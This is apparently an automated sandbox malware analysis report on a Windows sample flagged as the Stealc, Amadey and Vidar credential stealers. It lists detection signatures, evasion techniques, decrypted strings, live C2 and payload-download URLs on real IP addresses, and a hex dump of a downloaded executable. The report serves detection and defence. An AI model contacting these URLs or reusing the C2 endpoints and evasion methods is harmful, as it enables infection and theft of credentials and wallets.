Windows Analysis Report
EZrw1nNIpG.exe

Overview

General Information

Sample name: EZrw1nNIpG.exe
renamed because original name is a hash value
Original sample name: e3cbb274e66e95a1b7ee5c05d87abbd5.exe
Analysis ID: 1462819
MD5: e3cbb274e66e95a1b7ee5c05d87abbd5
SHA1: 93d96f3d0b6e5d13242c88af9dc9648cbc60fd0b
SHA256: e6c76393ad6b5516ed6e84adbd0687f981bf3c419e99d9c235a6948e63d383d4
Tags: 32, exe, Stealc, trojan
Infos:

Detection

Amadey, Mars Stealer, Stealc, Vidar
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected Amadeys stealer DLL
Yara detected Mars stealer
Yara detected Stealc
Yara detected Vidar stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
Machine Learning detection for dropped file
Machine Learning detection for sample
PE file contains section with special chars
PE file has nameless sections
Sample uses string decryption to hide its real strings
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Tries to steal Mail credentials (via file / registry access)
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates job files (autostart)
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

Name: Amadey
Description: Amadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware.
Attribution: No Attribution
Blogpost URLs: none
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey

Name: Stealc
Description: Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, Stealc is a non-resident stealer with flexible data collection settings, and its development relied on other prominent stealers: Vidar, Raccoon, Mars and Redline. Stealc is written in C and uses WinAPI functions. It mainly targets data from web browsers, extensions and desktop applications of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.
Attribution: No Attribution
Blogpost URLs: none
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Name: Vidar
Description: Vidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA software and Tor Browser.
Attribution: No Attribution
Blogpost URLs: none
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

AV Detection

Source: EZrw1nNIpG.exe Avira: detected
Source: http://147.45.47.155/ku4Nor9/index.php17037dc9 Avira URL Cloud: Label: phishing
Source: http://147.45.47.155/ Avira URL Cloud: Label: phishing
Source: http://85.28.47.4/69934896f997d5bb/mozglue.dll0~ Avira URL Cloud: Label: malware
Source: http://77.91.77.81/mine/amadka.exe Avira URL Cloud: Label: malware
Source: http://77.91.77.81/cost/go.exe Avira URL Cloud: Label: malware
Source: http://85.28.47.4/920475a59bac849d.phpsHy~ Avira URL Cloud: Label: malware
Source: http://85.28.47.4/ Avira URL Cloud: Label: malware
Source: http://85.28.47.4/69934896f997d5bb/vcruntime140.dlls9 Avira URL Cloud: Label: malware
Source: http://147.45.47.155/ku4Nor9/index.php Avira URL Cloud: Label: phishing
Source: http://147.45.47.155/ku4Nor9/index.phpspace Avira URL Cloud: Label: phishing
Source: http://147.45.47.155/ku4Nor9/index.phpft Avira URL Cloud: Label: phishing
Source: http://85.28.47.4/920475a59bac849d.php% Avira URL Cloud: Label: malware
Source: http://77.91.77.81/stealc/random.exeLL: Avira URL Cloud: Label: phishing
Source: http://85.28.47.4/69934896f997d5bb/softokn3.dll Avira URL Cloud: Label: malware
Source: http://77.91.77.81/stealc/random.exe50673b5d Avira URL Cloud: Label: phishing
Source: http://147.45.47.155/windows.storage.dllc Avira URL Cloud: Label: phishing
Source: http://85.28.47.4/920475a59bac849d.php5 Avira URL Cloud: Label: malware
Source: http://147.45.47.155/ku4Nor9/index.php-3693405117- Avira URL Cloud: Label: phishing
Source: http://147.45.47.155/ku4Nor9/index.phpl2 Avira URL Cloud: Label: phishing
Source: http://85.28.47.4/69934896f997d5bb/mozglue.dll Avira URL Cloud: Label: malware
Source: http://85.28.47.4/69934896f997d5bb/nss3.dll Avira URL Cloud: Label: malware
Source: http://85.28.47.4/69934896f997d5bb/vcruntime140.dll Avira URL Cloud: Label: malware
Source: http://147.45.47.155/ku4Nor9/index.phprsion Avira URL Cloud: Label: phishing
Source: http://147.45.47.155/ku4Nor9/index.phpe Avira URL Cloud: Label: phishing
Source: http://77.91.77.81/mine/amadka.exe00 Avira URL Cloud: Label: phishing
Source: http://85.28.47.4/69934896f997d5bb/freebl3.dll Avira URL Cloud: Label: malware
Source: http://85.28.47.4/920475a59bac849d.php Avira URL Cloud: Label: malware
Source: http://77.91.77.81/mine/amadka.exeK Avira URL Cloud: Label: phishing
Source: http://147.45.47.155/ku4Nor9/index.phpvJw Avira URL Cloud: Label: phishing
Source: http://77.91.77.81/stealc/random.exe Avira URL Cloud: Label: phishing
Source: http://85.28.47.4/69934896f997d5bb/sqlite3.dll Avira URL Cloud: Label: malware
Source: http://147.45.47.155/ku4Nor9/index.phpE1 Avira URL Cloud: Label: phishing
Source: http://77.91.77.81/cost/go.exe00 Avira URL Cloud: Label: phishing
Source: 85.28.47.4/920475a59bac849d.php Avira URL Cloud: Label: malware
Source: http://77.91.77.81/mine/amadka.exepera Avira URL Cloud: Label: phishing
Source: http://85.28.47.4/69934896f997d5bb/msvcp140.dll Avira URL Cloud: Label: malware
Source: http://85.28.47.4/69934896f997d5bb/sqlite3.dllb Avira URL Cloud: Label: malware
Source: http://147.45.47.155/SysWOW64 Avira URL Cloud: Label: phishing
Source: http://85.28.47.4/69934896f997d5bb/vcruntime140.dlli8 Avira URL Cloud: Label: malware
Source: http://85.28.47.4/69934896f997d5bb/mozglue.dll-~ Avira URL Cloud: Label: malware
Source: http://85.28.47.4 Avira URL Cloud: Label: malware
Source: http://147.45.47.155/ku4Nor9/index.phpmL Avira URL Cloud: Label: phishing
Source: http://85.28.47.4/69934896f997d5bb/sqlite3.dllq Avira URL Cloud: Label: malware
Source: http://85.28.47.4/920475a59bac849d.php%? Avira URL Cloud: Label: malware
Source: http://77.91.77.81/stealc/random.exeAL- Avira URL Cloud: Label: phishing
Source: http://147.45.47.155/ku4Nor9/index.phpM Avira URL Cloud: Label: phishing
Source: http://147.45.47.155/ku4Nor9/index.php;R Avira URL Cloud: Label: phishing
Source: http://147.45.47.155/ku4Nor9/index.phpH Avira URL Cloud: Label: phishing
Source: http://77.91.77.81/cost/go.exeAppData Avira URL Cloud: Label: phishing
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\random[1].exe Avira: detection malicious, Label: TR/Crypt.ZPACK.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\amadka[1].exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Temp\1000022001\3eb62d09c2.exe Avira: detection malicious, Label: TR/Crypt.ZPACK.Gen
Source: 13.2.3eb62d09c2.exe.d00000.0.unpack Malware Configuration Extractor: Vidar {"C2 url": "http://85.28.47.4/920475a59bac849d.php"}
Source: explortu.exe.736.10.memstrmin Malware Configuration Extractor: Amadey {"C2 url": ["http://147.45.47.155/ku4Nor9/index.php"]}
Source: EZrw1nNIpG.exe.3792.0.memstrmin Malware Configuration Extractor: StealC {"C2 url": "85.28.47.4/920475a59bac849d.php"}
Source: http://77.91.77.81/cost/go.exe Virustotal: Detection: 26%
Source: http://147.45.47.155/ Virustotal: Detection: 20%
Source: http://77.91.77.81/mine/amadka.exe Virustotal: Detection: 27%
Source: http://85.28.47.4/ Virustotal: Detection: 14%
Source: http://147.45.47.155/ku4Nor9/index.php Virustotal: Detection: 21%
Source: http://85.28.47.4/920475a59bac849d.php% Virustotal: Detection: 6%
Source: http://85.28.47.4/69934896f997d5bb/softokn3.dll Virustotal: Detection: 6%
Source: http://85.28.47.4/920475a59bac849d.php5 Virustotal: Detection: 10%
Source: http://85.28.47.4/69934896f997d5bb/mozglue.dll Virustotal: Detection: 7%
Source: http://85.28.47.4/69934896f997d5bb/vcruntime140.dll Virustotal: Detection: 7%
Source: http://85.28.47.4/69934896f997d5bb/nss3.dll Virustotal: Detection: 9%
Source: EZrw1nNIpG.exe ReversingLabs: Detection: 50%
Source: EZrw1nNIpG.exe Virustotal: Detection: 54%
Source: Submitted Sample Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\random[1].exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\amadka[1].exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1000022001\3eb62d09c2.exe Joe Sandbox ML: detected
Source: EZrw1nNIpG.exe Joe Sandbox ML: detected
Source: 13.2.3eb62d09c2.exe.d00000.0.unpack String decryptor: INSERT_KEY_HERE
Source: 13.2.3eb62d09c2.exe.d00000.0.unpack String decryptor: GetProcAddress
Source: 13.2.3eb62d09c2.exe.d00000.0.unpack String decryptor: LoadLibraryA
Source: 13.2.3eb62d09c2.exe.d00000.0.unpack String decryptor: lstrcatA
Source: 13.2.3eb62d09c2.exe.d00000.0.unpack String decryptor: OpenEventA
Source: 13.2.3eb62d09c2.exe.d00000.0.unpack String decryptor: CreateEventA
Source: 13.2.3eb62d09c2.exe.d00000.0.unpack String decryptor: CloseHandle
Source: 13.2.3eb62d09c2.exe.d00000.0.unpack String decryptor: Sleep
Source: 13.2.3eb62d09c2.exe.d00000.0.unpack String decryptor: GetUserDefaultLangID
Source: 13.2.3eb62d09c2.exe.d00000.0.unpack String decryptor: VirtualAllocExNuma
Source: 13.2.3eb62d09c2.exe.d00000.0.unpack String decryptor: VirtualFree
Source: 13.2.3eb62d09c2.exe.d00000.0.unpack String decryptor: GetSystemInfo
Source: 13.2.3eb62d09c2.exe.d00000.0.unpack String decryptor: VirtualAlloc
Source: 13.2.3eb62d09c2.exe.d00000.0.unpack String decryptor: HeapAlloc
Source: 13.2.3eb62d09c2.exe.d00000.0.unpack String decryptor: GetComputerNameA
Source: 13.2.3eb62d09c2.exe.d00000.0.unpack String decryptor: lstrcpyA
Source: 13.2.3eb62d09c2.exe.d00000.0.unpack String decryptor: GetProcessHeap
Source: 13.2.3eb62d09c2.exe.d00000.0.unpack String decryptor: GetCurrentProcess
Source: 13.2.3eb62d09c2.exe.d00000.0.unpack String decryptor: lstrlenA
Source: 13.2.3eb62d09c2.exe.d00000.0.unpack String decryptor: ExitProcess
Source: 13.2.3eb62d09c2.exe.d00000.0.unpack String decryptor: GlobalMemoryStatusEx
Source: 13.2.3eb62d09c2.exe.d00000.0.unpack String decryptor: GetSystemTime
Source: 13.2.3eb62d09c2.exe.d00000.0.unpack String decryptor: SystemTimeToFileTime
Source: 13.2.3eb62d09c2.exe.d00000.0.unpack String decryptor: advapi32.dll
Source: 13.2.3eb62d09c2.exe.d00000.0.unpack String decryptor: gdi32.dll
Source: 13.2.3eb62d09c2.exe.d00000.0.unpack String decryptor: user32.dll
Source: 13.2.3eb62d09c2.exe.d00000.0.unpack String decryptor: crypt32.dll
Source: 13.2.3eb62d09c2.exe.d00000.0.unpack String decryptor: ntdll.dll
Source: 13.2.3eb62d09c2.exe.d00000.0.unpack String decryptor: GetUserNameA
Source: 13.2.3eb62d09c2.exe.d00000.0.unpack String decryptor: CreateDCA
Source: 13.2.3eb62d09c2.exe.d00000.0.unpack String decryptor: GetDeviceCaps
Source: 13.2.3eb62d09c2.exe.d00000.0.unpack String decryptor: ReleaseDC
Source: 13.2.3eb62d09c2.exe.d00000.0.unpack String decryptor: CryptStringToBinaryA
Source: 13.2.3eb62d09c2.exe.d00000.0.unpack String decryptor: sscanf
Source: 13.2.3eb62d09c2.exe.d00000.0.unpack String decryptor: VMwareVMware
Source: 13.2.3eb62d09c2.exe.d00000.0.unpack String decryptor: HAL9TH
Source: 13.2.3eb62d09c2.exe.d00000.0.unpack String decryptor: JohnDoe
Source: 13.2.3eb62d09c2.exe.d00000.0.unpack String decryptor: DISPLAY
Source: 13.2.3eb62d09c2.exe.d00000.0.unpack String decryptor: %hu/%hu/%hu
Source: 13.2.3eb62d09c2.exe.d00000.0.unpack String decryptor: http://85.28.47.4
Source: 13.2.3eb62d09c2.exe.d00000.0.unpack String decryptor: /920475a59bac849d.php
Source: 13.2.3eb62d09c2.exe.d00000.0.unpack String decryptor: /69934896f997d5bb/
Source: 13.2.3eb62d09c2.exe.d00000.0.unpack String decryptor: default
Source: 13.2.3eb62d09c2.exe.d00000.0.unpack String decryptor: GetEnvironmentVariableA
Source: 13.2.3eb62d09c2.exe.d00000.0.unpack String decryptor: GetFileAttributesA
Source: 13.2.3eb62d09c2.exe.d00000.0.unpack String decryptor: GlobalLock
Source: 13.2.3eb62d09c2.exe.d00000.0.unpack String decryptor: HeapFree
Source: 13.2.3eb62d09c2.exe.d00000.0.unpack String decryptor: GetFileSize
Source: 13.2.3eb62d09c2.exe.d00000.0.unpack String decryptor: GlobalSize
Source: 13.2.3eb62d09c2.exe.d00000.0.unpack String decryptor: CreateToolhelp32Snapshot
Source: 13.2.3eb62d09c2.exe.d00000.0.unpack String decryptor: IsWow64Process
Source: 13.2.3eb62d09c2.exe.d00000.0.unpack String decryptor: Process32Next
Source: 13.2.3eb62d09c2.exe.d00000.0.unpack String decryptor: GetLocalTime
Source: 13.2.3eb62d09c2.exe.d00000.0.unpack String decryptor: FreeLibrary
Source: 13.2.3eb62d09c2.exe.d00000.0.unpack String decryptor: GetTimeZoneInformation
Source: 13.2.3eb62d09c2.exe.d00000.0.unpack String decryptor: GetSystemPowerStatus
Source: 13.2.3eb62d09c2.exe.d00000.0.unpack String decryptor: GetVolumeInformationA
Source: 13.2.3eb62d09c2.exe.d00000.0.unpack String decryptor: GetWindowsDirectoryA
Source: 13.2.3eb62d09c2.exe.d00000.0.unpack String decryptor: Process32First
Source: 13.2.3eb62d09c2.exe.d00000.0.unpack String decryptor: GetLocaleInfoA
Source: 13.2.3eb62d09c2.exe.d00000.0.unpack String decryptor: GetUserDefaultLocaleName
Source: 13.2.3eb62d09c2.exe.d00000.0.unpack String decryptor: GetModuleFileNameA
Source: 13.2.3eb62d09c2.exe.d00000.0.unpack String decryptor: DeleteFileA
Source: 13.2.3eb62d09c2.exe.d00000.0.unpack String decryptor: FindNextFileA
Source: 13.2.3eb62d09c2.exe.d00000.0.unpack String decryptor: LocalFree
Source: 13.2.3eb62d09c2.exe.d00000.0.unpack String decryptor: FindClose
Source: 13.2.3eb62d09c2.exe.d00000.0.unpack String decryptor: SetEnvironmentVariableA
Source: 13.2.3eb62d09c2.exe.d00000.0.unpack String decryptor: LocalAlloc
Source: 13.2.3eb62d09c2.exe.d00000.0.unpack String decryptor: GetFileSizeEx
Source: 13.2.3eb62d09c2.exe.d00000.0.unpack String decryptor: ReadFile
Source: 13.2.3eb62d09c2.exe.d00000.0.unpack String decryptor: SetFilePointer
Source: 13.2.3eb62d09c2.exe.d00000.0.unpack String decryptor: WriteFile
Source: 13.2.3eb62d09c2.exe.d00000.0.unpack String decryptor: CreateFileA
Source: 13.2.3eb62d09c2.exe.d00000.0.unpack String decryptor: FindFirstFileA
Source: 13.2.3eb62d09c2.exe.d00000.0.unpack String decryptor: CopyFileA
Source: 13.2.3eb62d09c2.exe.d00000.0.unpack String decryptor: VirtualProtect
Source: 13.2.3eb62d09c2.exe.d00000.0.unpack String decryptor: GetLogicalProcessorInformationEx
Source: 13.2.3eb62d09c2.exe.d00000.0.unpack String decryptor: GetLastError
Source: 13.2.3eb62d09c2.exe.d00000.0.unpack String decryptor: lstrcpynA
Source: 13.2.3eb62d09c2.exe.d00000.0.unpack String decryptor: MultiByteToWideChar
Source: 13.2.3eb62d09c2.exe.d00000.0.unpack String decryptor: GlobalFree
Source: 13.2.3eb62d09c2.exe.d00000.0.unpack String decryptor: WideCharToMultiByte
Source: 13.2.3eb62d09c2.exe.d00000.0.unpack String decryptor: GlobalAlloc
Source: 13.2.3eb62d09c2.exe.d00000.0.unpack String decryptor: OpenProcess
Source: 13.2.3eb62d09c2.exe.d00000.0.unpack String decryptor: TerminateProcess
Source: 13.2.3eb62d09c2.exe.d00000.0.unpack String decryptor: GetCurrentProcessId
Source: 13.2.3eb62d09c2.exe.d00000.0.unpack String decryptor: gdiplus.dll
Source: 13.2.3eb62d09c2.exe.d00000.0.unpack String decryptor: ole32.dll
Source: 13.2.3eb62d09c2.exe.d00000.0.unpack String decryptor: bcrypt.dll
Source: 13.2.3eb62d09c2.exe.d00000.0.unpack String decryptor: wininet.dll
Source: 13.2.3eb62d09c2.exe.d00000.0.unpack String decryptor: shlwapi.dll
Source: 13.2.3eb62d09c2.exe.d00000.0.unpack String decryptor: shell32.dll
Source: 13.2.3eb62d09c2.exe.d00000.0.unpack String decryptor: psapi.dll
Source: 13.2.3eb62d09c2.exe.d00000.0.unpack String decryptor: rstrtmgr.dll
Source: 13.2.3eb62d09c2.exe.d00000.0.unpack String decryptor: CreateCompatibleBitmap
Source: 13.2.3eb62d09c2.exe.d00000.0.unpack String decryptor: SelectObject
Source: 13.2.3eb62d09c2.exe.d00000.0.unpack String decryptor: BitBlt
Source: 13.2.3eb62d09c2.exe.d00000.0.unpack String decryptor: DeleteObject
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe Code function: 0_2_6C7D6C80 CryptQueryObject,CryptMsgGetParam,moz_xmalloc,memset,CryptMsgGetParam,CertFindCertificateInStore,free,CertGetNameStringW,moz_xmalloc,memset,CertGetNameStringW,CertFreeCertificateContext,CryptMsgClose,CertCloseStore,CreateFileW,moz_xmalloc,memset,memset,CryptQueryObject,free,CloseHandle,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,moz_xmalloc,memset,GetLastError,moz_xmalloc,memset,CryptBinaryToStringW,_wcsupr_s,free,GetLastError,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,__Init_thread_footer,__Init_thread_footer, 0_2_6C7D6C80
Source: EZrw1nNIpG.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: Binary string: mozglue.pdbP source: EZrw1nNIpG.exe, 00000000.00000002.2417867750.000000006C83D000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source: Binary string: freebl3.pdb source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source: Binary string: freebl3.pdbp source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source: Binary string: nss3.pdb@ source: EZrw1nNIpG.exe, 00000000.00000002.2418656540.000000006C9FF000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source: Binary string: softokn3.pdb@ source: softokn3[1].dll.0.dr, softokn3.dll.0.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.0.dr, vcruntime140[1].dll.0.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140[1].dll.0.dr, msvcp140.dll.0.dr
Source: Binary string: nss3.pdb source: EZrw1nNIpG.exe, 00000000.00000002.2418656540.000000006C9FF000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source: Binary string: mozglue.pdb source: EZrw1nNIpG.exe, 00000000.00000002.2417867750.000000006C83D000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source: Binary string: softokn3.pdb source: softokn3[1].dll.0.dr, softokn3.dll.0.dr
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\

Networking

Source: Traffic Snort IDS: 2044243 ET TROJAN [SEKOIA.IO] Win32/Stealc C2 Check-in 192.168.2.6:49713 -> 85.28.47.4:80
Source: Traffic Snort IDS: 2044244 ET TROJAN Win32/Stealc Requesting browsers Config from C2 192.168.2.6:49713 -> 85.28.47.4:80
Source: Traffic Snort IDS: 2051828 ET TROJAN Win32/Stealc Active C2 Responding with browsers Config M1 85.28.47.4:80 -> 192.168.2.6:49713
Source: Traffic Snort IDS: 2044246 ET TROJAN Win32/Stealc Requesting plugins Config from C2 192.168.2.6:49713 -> 85.28.47.4:80
Source: Traffic Snort IDS: 2051831 ET TROJAN Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 85.28.47.4:80 -> 192.168.2.6:49713
Source: Traffic Snort IDS: 2856147 ETPRO TROJAN Amadey CnC Activity M3 192.168.2.6:49730 -> 147.45.47.155:80
Source: Traffic Snort IDS: 2856122 ETPRO TROJAN Amadey CnC Response M1 147.45.47.155:80 -> 192.168.2.6:49730
Source: Traffic Snort IDS: 2044243 ET TROJAN [SEKOIA.IO] Win32/Stealc C2 Check-in 192.168.2.6:49733 -> 85.28.47.4:80
Source: Malware configuration extractor URLs: 85.28.47.4/920475a59bac849d.php
Source: Malware configuration extractor URLs: http://85.28.47.4/920475a59bac849d.php
Source: Malware configuration extractor IPs: 147.45.47.155
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 26 Jun 2024 06:16:17 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 14:30:30 GMTETag: "10e436-5e7eeebed8d80"Accept-Ranges: bytesContent-Length: 1106998Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c 02 0d 00 d0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 84 25 0b 00 00 10 00 00 00 26 0b 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 7c 27 00 00 00 40 0b 00 00 28 00 00 00 2c 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 70 44 01 00 00 70 0b 00 00 46 01 00 00 54 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 28 08 00 00 00 c0 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 88 2a 00 00 00 d0 0c 00 00 2c 00 00 00 9a 0c 00 00 00 00 00 00 00 00 00 00 
00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 d0 0c 00 00 00 00 0d 00 00 0e 00 00 00 c6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 10 0d 00 00 02 00 00 00 d4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 20 0d 00 00 02 00 00 00 d6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 73 72 63 00 00 00 a8 04 00 00 00 30 0d 00 00 06 00 00 00 d8 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 18 3c 00 00 00 40 0d 00 00 3e 00 00 00 de 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 38 05 00 00 00 80 0d 00 00 06 00 00 00 1c 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 52 c8 00 00 00 90 0d 00 00 ca 00 00 00 22 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 31 00 00 00 00 00 5d 27 00 00 00 60 0e 00 00 28 00 00 00 ec 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 34 35 00 00 00 00 00 9a 2d 00 00 00 90 0e 00 00
